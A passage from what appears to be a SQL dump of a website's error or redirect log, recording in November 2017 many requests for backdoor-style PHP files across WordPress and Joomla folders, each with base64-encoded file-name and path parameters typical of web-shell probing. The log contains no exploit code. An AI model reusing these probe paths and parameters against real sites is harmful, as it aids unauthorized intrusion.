00:00:00'),(12892,'http://hallcrestheights.org/robots.txt.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:42:41','0000-00-00 00:00:00'),(12893,'http://hallcrestheights.org/sql_dump.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:43:25','0000-00-00 00:00:00'),(12894,'http://hallcrestheights.org/jconfig.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:42:12','0000-00-00 00:00:00'),(12895,'http://hallcrestheights.org/thumb.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:43:36','0000-00-00 00:00:00'),(12896,'http://hallcrestheights.org/al277.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:43:02','0000-00-00 00:00:00'),(12897,'http://hallcrestheights.org/images/al277.php?z3=QUJDdWh4LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:44:25','0000-00-00 00:00:00'),(12898,'http://hallcrestheights.org/wsdl.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:44:28','0000-00-00 00:00:00'),(12899,'http://hallcrestheights.org/wp-data.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:44:34','0000-00-00 00:00:00'),(12900,'http://hallcrestheights.org/media/1ndex.php?z3=QUJDdWh4LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:45:36','0000-00-00 00:00:00'),(12901,'http://hallcrestheights.org/media/tmp.php?z3=QUJDdWh4LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:45:36','0000-00-00 00:00:00'),(12902,'http://hallcrestheights.org/google-assist.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:45:56','0000-00-00 00:00:00'),(12903,'http://hallcrestheights.org/elements.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:46:46','0000-00-00 00:00:00'),(12904,'http://hallcrestheights.org/cache/defau1t.php?z3=QUJDdWh4LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:46:49','0000-00-00 00:00:00'),(12905,'http://hallcrestheights.org/roubt.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:46:54','0000-00-00 00:00:00'),(12906,'http://hallcrestheights.org/bookmark.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:47:03','0000-00-00 00:00:00'),(12907,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:47:32','0000-00-00 00:00:00'),(12908,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:48:18','0000-00-00 00:00:00'),(12909,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=QUJDdWh4LnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:47:35','0000-00-00 00:00:00'),(12910,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:49:21','0000-00-00 00:00:00'),(12911,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:49:27','0000-00-00 00:00:00'),(12912,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:49:37','0000-00-00 00:00:00'),(12913,'http://hallcrestheights.org/A.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:50:53','0000-00-00 00:00:00'),(12914,'http://hallcrestheights.org/modules/modules/modules.php?z3=QUJDdWh4LnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:49:35','0000-00-00 00:00:00'),(12915,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:49:39','0000-00-00 00:00:00'),(12916,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:51:04','0000-00-00 00:00:00'),(12917,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:49:49','0000-00-00 00:00:00'),(12918,'http://hallcrestheights.org/sqlbak.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:51:43','0000-00-00 00:00:00'),(12919,'http://hallcrestheights.org/email.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:52:10','0000-00-00 00:00:00'),(12920,'http://hallcrestheights.org/images/stories/0day.php?z3=QUJDdWh4LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:52:12','0000-00-00 00:00:00'),(12921,'http://hallcrestheights.org/install.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:52:18','0000-00-00 00:00:00'),(12922,'http://hallcrestheights.org/error-log.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:53:42','0000-00-00 00:00:00'),(12923,'http://hallcrestheights.org/xmlsrpc.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:53:42','0000-00-00 00:00:00'),(12924,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:54:18','0000-00-00 00:00:00'),(12925,'http://hallcrestheights.org/shootmei.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:53:39','0000-00-00 00:00:00'),(12926,'http://hallcrestheights.org/infos.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:55:46','0000-00-00 00:00:00'),(12927,'http://hallcrestheights.org/content.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:56:18','0000-00-00 00:00:00'),(12928,'http://hallcrestheights.org/Abbrevsprl.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 22:57:39','0000-00-00 00:00:00'),(12929,'http://hallcrestheights.org/shootme.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 23:00:50','0000-00-00 00:00:00'),(12930,'http://hallcrestheights.org/images/xxx.php?z3=QUJDdWh4LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-16 23:01:18','0000-00-00 00:00:00'),(12931,'http://hallcrestheights.org/wp-content/1ndex.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2017-11-16 23:00:27','0000-00-00 00:00:00'),(12932,'http://hallcrestheights.org/cache/support.php?z3=QUJDdWh4LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 23:02:13','0000-00-00 00:00:00'),(12933,'http://hallcrestheights.org/media/404.php?z3=QUJDdWh4LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 23:02:36','0000-00-00 00:00:00'),(12934,'http://hallcrestheights.org/authenticating.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:01:18','0000-00-00 00:00:00'),(12935,'http://hallcrestheights.org/show.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:02:41','0000-00-00 00:00:00'),(12936,'http://hallcrestheights.org/cache/news.php?z3=QUJDdWh4LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:02:47','0000-00-00 00:00:00'),(12937,'http://hallcrestheights.org/images/head.php?z3=QUJDdWh4LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:02:56','0000-00-00 00:00:00'),(12938,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:03:02','0000-00-00 00:00:00'),(12939,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:03:04','0000-00-00 00:00:00'),(12940,'http://hallcrestheights.org/media/reads.php?z3=QUJDdWh4LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-16 23:04:10','0000-00-00 00:00:00'),(12941,'http://hallcrestheights.org/files/files.php?z3=QUJDdWh4LnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:04:10','0000-00-00 00:00:00'),(12942,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:04:15','0000-00-00 00:00:00'),(12943,'http://hallcrestheights.org/cache/list.php?z3=QUJDdWh4LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:05:14','0000-00-00 00:00:00'),(12944,'http://hallcrestheights.org/images/laj.php?z3=QUJDdWh4LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-16 23:08:27','0000-00-00 00:00:00'),(12945,'http://hallcrestheights.org/log.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:08:39','0000-00-00 00:00:00'),(12946,'http://hallcrestheights.org/includes/u2p.php?z3=QUJDdWh4LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:08:43','0000-00-00 00:00:00'),(12947,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=QUJDdWh4LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:08:49','0000-00-00 00:00:00'),(12948,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=QUJDdWh4LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:08:52','0000-00-00 00:00:00'),(12949,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=QUJDdWh4LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:09:04','0000-00-00 00:00:00'),(12950,'http://hallcrestheights.org/wp-main.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:09:50','0000-00-00 00:00:00'),(12951,'http://hallcrestheights.org/images/robots.txt.php?z3=QUJDdWh4LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:10:01','0000-00-00 00:00:00'),(12952,'http://hallcrestheights.org/cli/40dd1d.php?z3=QUJDdWh4LnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 23:08:45','0000-00-00 00:00:00'),(12953,'http://hallcrestheights.org/images/1ndex.php?z3=V09qcExwLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 13:52:04','0000-00-00 00:00:00'),(12954,'http://hallcrestheights.org/cache/cachee.php?z3=V09qcExwLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 13:53:46','0000-00-00 00:00:00'),(12955,'http://hallcrestheights.org/maill.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 13:54:54','0000-00-00 00:00:00'),(12956,'http://hallcrestheights.org/wp-cache.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 13:53:40','0000-00-00 00:00:00'),(12957,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 13:55:16','0000-00-00 00:00:00'),(12958,'http://hallcrestheights.org/SessionController.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 13:55:20','0000-00-00 00:00:00'),(12959,'http://hallcrestheights.org/webconfig.txt.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 13:57:17','0000-00-00 00:00:00'),(12960,'http://hallcrestheights.org/robots.txt.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 13:58:35','0000-00-00 00:00:00'),(12961,'http://hallcrestheights.org/sql_dump.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:01:47','0000-00-00 00:00:00'),(12962,'http://hallcrestheights.org/jconfig.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:02:11','0000-00-00 00:00:00'),(12963,'http://hallcrestheights.org/thumb.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:02:15','0000-00-00 00:00:00'),(12964,'http://hallcrestheights.org/xmlrpc-activate.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:01:32','0000-00-00 00:00:00'),(12965,'http://hallcrestheights.org/al277.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:01:35','0000-00-00 00:00:00'),(12966,'http://hallcrestheights.org/images/al277.php?z3=V09qcExwLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:03:01','0000-00-00 00:00:00'),(12967,'http://hallcrestheights.org/wsdl.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:01:44','0000-00-00 00:00:00'),(12968,'http://hallcrestheights.org/wp-data.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:03:13','0000-00-00 00:00:00'),(12969,'http://hallcrestheights.org/media/1ndex.php?z3=V09qcExwLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:05:11','0000-00-00 00:00:00'),(12970,'http://hallcrestheights.org/media/tmp.php?z3=V09qcExwLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:05:23','0000-00-00 00:00:00'),(12971,'http://hallcrestheights.org/google-assist.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:05:42','0000-00-00 00:00:00'),(12972,'http://hallcrestheights.org/elements.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:05:35','0000-00-00 00:00:00'),(12973,'http://hallcrestheights.org/cache/defau1t.php?z3=V09qcExwLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:07:02','0000-00-00 00:00:00'),(12974,'http://hallcrestheights.org/roubt.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:07:07','0000-00-00 00:00:00'),(12975,'http://hallcrestheights.org/bookmark.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:07:35','0000-00-00 00:00:00'),(12976,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:11:12','0000-00-00 00:00:00'),(12977,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:11:16','0000-00-00 00:00:00'),(12978,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=V09qcExwLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:12:05','0000-00-00 00:00:00'),(12979,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:11:17','0000-00-00 00:00:00'),(12980,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:11:25','0000-00-00 00:00:00'),(12981,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:12:50','0000-00-00 00:00:00'),(12982,'http://hallcrestheights.org/modules/modules/modules.php?z3=V09qcExwLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:16:30','0000-00-00 00:00:00'),(12983,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:15:19','0000-00-00 00:00:00'),(12984,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:16:49','0000-00-00 00:00:00'),(12985,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:16:59','0000-00-00 00:00:00'),(12986,'http://hallcrestheights.org/sqlbak.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:17:15','0000-00-00 00:00:00'),(12987,'http://hallcrestheights.org/email.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:18:23','0000-00-00 00:00:00'),(12988,'http://hallcrestheights.org/images/stories/0day.php?z3=V09qcExwLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:18:25','0000-00-00 00:00:00'),(12989,'http://hallcrestheights.org/install.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:17:11','0000-00-00 00:00:00'),(12990,'http://hallcrestheights.org/xmlsrpc.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:21:41','0000-00-00 00:00:00'),(12991,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:23:24','0000-00-00 00:00:00'),(12992,'http://hallcrestheights.org/shootmei.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:23:27','0000-00-00 00:00:00'),(12993,'http://hallcrestheights.org/infos.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:22:32','0000-00-00 00:00:00'),(12994,'http://hallcrestheights.org/Abbrevsprl.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:28:09','0000-00-00 00:00:00'),(12995,'http://hallcrestheights.org/shootme.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:32:51','0000-00-00 00:00:00'),(12996,'http://hallcrestheights.org/wp-content/1ndex.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:35:17','0000-00-00 00:00:00'),(12997,'http://hallcrestheights.org/cache/support.php?z3=V09qcExwLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:36:04','0000-00-00 00:00:00'),(12998,'http://hallcrestheights.org/authenticating.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:36:14','0000-00-00 00:00:00'),(12999,'http://hallcrestheights.org/show.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:37:44','0000-00-00 00:00:00'),(13000,'http://hallcrestheights.org/cache/news.php?z3=V09qcExwLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:36:33','0000-00-00 00:00:00'),(13001,'http://hallcrestheights.org/images/head.php?z3=V09qcExwLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:37:59','0000-00-00 00:00:00'),(13002,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:36:44','0000-00-00 00:00:00'),(13003,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:39:47','0000-00-00 00:00:00'),(13004,'http://hallcrestheights.org/media/reads.php?z3=V09qcExwLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:39:24','0000-00-00 00:00:00'),(13005,'http://hallcrestheights.org/files/files.php?z3=V09qcExwLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:40:47','0000-00-00 00:00:00'),(13006,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=V09qcExwLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:41:12','0000-00-00 00:00:00'),(13007,'http://hallcrestheights.org/cache/list.php?z3=V09qcExwLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:42:42','0000-00-00 00:00:00'),(13008,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=V09qcExwLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-17 14:43:33','0000-00-00 00:00:00'),(13009,'http://hallcrestheights.org/images/laj.php?z3=V09qcExwLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:45:31','0000-00-00 00:00:00'),(13010,'http://hallcrestheights.org/log.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:47:16','0000-00-00 00:00:00'),(13011,'http://hallcrestheights.org/includes/u2p.php?z3=V09qcExwLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:47:19','0000-00-00 00:00:00'),(13012,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=V09qcExwLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:46:02','0000-00-00 00:00:00'),(13013,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=V09qcExwLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:46:14','0000-00-00 00:00:00'),(13014,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=V09qcExwLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:46:19','0000-00-00 00:00:00'),(13015,'http://hallcrestheights.org/wp-main.php?z3=V09qcExwLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:48:07','0000-00-00 00:00:00'),(13016,'http://hallcrestheights.org/images/robots.txt.php?z3=V09qcExwLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:48:10','0000-00-00 00:00:00'),(13017,'http://hallcrestheights.org/cli/40dd1d.php?z3=V09qcExwLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-11-17 14:48:13','0000-00-00 00:00:00'),(13018,'http://hallcrestheights.org/wp-includes/wp-pages.lib.php',NULL,'hallcrestheights.org','',1,0,'2017-11-21 01:03:25','0000-00-00 00:00:00'),(13019,'http://hallcrestheights.org/js.php',NULL,'http://site.ru','',3,0,'2017-11-22 02:09:45','0000-00-00 00:00:00'),(13020,'http://hallcrestheights.org/images/1ndex.php?z3=N3V0RnlSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:11:40','0000-00-00 00:00:00'),(13021,'http://hallcrestheights.org/cache/cachee.php?z3=N3V0RnlSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:13:52','0000-00-00 00:00:00'),(13022,'http://hallcrestheights.org/maill.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:15:04','0000-00-00 00:00:00'),(13023,'http://hallcrestheights.org/wp-cache.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:13:46','0000-00-00 00:00:00'),(13024,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=N3V0RnlSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:16:30','0000-00-00 00:00:00'),(13025,'http://hallcrestheights.org/SessionController.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:17:56','0000-00-00 00:00:00'),(13026,'http://hallcrestheights.org/webconfig.txt.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:16:50','0000-00-00 00:00:00'),(13027,'http://hallcrestheights.org/robots.txt.php?z3=N3V0RnlSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-23 13:20:29','0000-00-00 